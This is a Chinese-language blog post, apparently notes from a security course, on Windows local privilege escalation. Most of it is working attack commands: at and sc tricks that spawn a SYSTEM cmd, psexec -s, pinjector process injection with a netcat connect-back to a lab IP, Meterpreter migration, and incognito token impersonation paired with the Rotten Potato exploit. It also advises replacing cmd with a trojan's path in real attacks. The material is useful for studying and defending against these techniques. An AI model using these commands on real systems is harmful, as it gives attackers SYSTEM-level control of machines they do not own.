【权限提升】Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
【权限提升】Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
文章内容复现于小迪安全相关课程
Win本地用户-AT&SC&PS命令
利用Windows特性,权限继承
1、at命令提权的原理
at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system权限。
适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除.
当我们拿到低权限的用户(webshell用户不能创建计划命令),通过连接上服务器后,可以通过at命令来进行本地提权。
提权命令:Test in Win2k3 系统级默认调用
at 21:00 /interactive cmd (在20:33分生成一个交互式的System权限的cmd)
2、sc命令
sc是用于与服务控制管理器和服务进行通信的命令行程序。提供的功能类似于控制面板中管理工具项中的服务。适用版本:windows 7、8、03、08、12、16
#创建一个名叫syscmd的新的交互式的cmd执行服务
sc Create syscmd binPath= "cmd /K start" type= own type= interact#运行服务
sc start syscmdwin2k3下:
win server 2008下:
- PsTools 百度云链接
Telnet 等实用工具和远程控制程序(如 Symantec 的 PC Anywhere)允许你在远程系统上执行程序,但它们可能很难设置并要求你在想要访问的远程系统上安装客户端软件。 PsExec 是一种轻量级 telnet-replacement,可用于在其他系统上执行进程,为控制台应用程序提供完全交互性,而无需手动安装客户端软件。 PsExec 最强大的用途包括对远程系统和远程启用工具(如 IpConfig)启动交互式命令提示符,否则无法显示有关远程系统的信息。 注意:一些防病毒扫描程序报告一个或多个工具感染了“远程管理员”病毒。 PsTools 中没有含有病毒,但它们已被病毒使用,这就是为什么它们触发病毒通知的原因。
适用版本:Test in Win2012 and Win2008 & Win2016 其他未测 基本可以
PsTools - Sysinternals | Microsoft Learn
psexec.exe -accepteula -s -i -d cmd #调用运行cmdwin2016:
win10(非服务器版本):
版本一:
版本二:
服务器版本基本可以, PC个人电脑具体情况看win10上是否安装对应服务 实战情况下将cmd命令替换成后门路径,以system权限执行木马。
WIN本地用户-进程迁移注入获取 pinjector百度云链接
相当于开了一个后门,注入到其他用户进程下!
- Win2008以前版本 -Test in Win2k3-本地权限-本地虚拟机
部分进程默认system权限
pinjector -p 420 cmd 3333 #在PID= 进程下添加一个继承父进程权限的线程
nc 192.168.46.149 3333
2、MSF进程注入 本地权限-Win2008&2012&2016
ps //查看进程
migrate PID //迁移对应PID
将后门上线普通用户权限进程注入到system权限进程下测试版本win server2016:
WIN本地用户-Web-令牌窃取&土豆
令牌窃取 Win2008 Win2012
假冒令牌可以假冒一个网络中的另一个用户进行各类操作。 所以当一个攻击者需要域管理员的操作权限时候,需通过假冒域管理员的令牌进行攻击。
- 本地权限 - win server2008&win 10
测试版本win server2008:
use incognito
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
经过后续测试2003 2012 2016都能提权成功
测试版本win10 个人PC
- Web权限 - Test in Win2008 12 16
webshell权限是不能直接进行令牌窃取的,配合烂土豆漏洞(ms16-075)
execute -cH -f ./potato.exe //配合烂土豆 use incognito list_tokens -u impersonate_token "NT AUTHORITY\SYSTEM"
测试版本win server2008
以webshell权限执行后门,即是IIS APPPOOL\asp access权限,且直接使用令牌窃取不能成功,需配合烂土豆漏洞
未配合烂土豆漏洞:
配合烂土豆漏洞:
腾讯云开发者
